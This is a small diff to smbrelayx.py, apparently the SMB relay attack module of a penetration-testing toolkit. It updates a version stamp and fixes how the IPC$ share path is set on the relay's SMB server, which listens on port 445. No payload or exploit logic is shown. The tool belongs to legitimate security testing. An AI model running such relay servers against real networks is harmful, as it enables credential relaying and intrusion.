@@ -5,7 +5,7 @@
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# $Id: smbrelayx.py 754 2013-05-05 20:56:20Z bethus@gmail.com $
+# $Id: smbrelayx.py 772 2013-07-05 22:25:53Z bethus@gmail.com $
 #
 # SMB Relay Module
 #
@@ -345,7 +345,7 @@ class SMBRelayServer(Thread):
         smbConfig.set('IPC$','comment','')
         smbConfig.set('IPC$','read only','yes')
         smbConfig.set('IPC$','share type','3')
-        smbConfig.set('IPC$','path')
+        smbConfig.set('IPC$','path','')
 
         self.server = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
         self.server.processConfigFile()
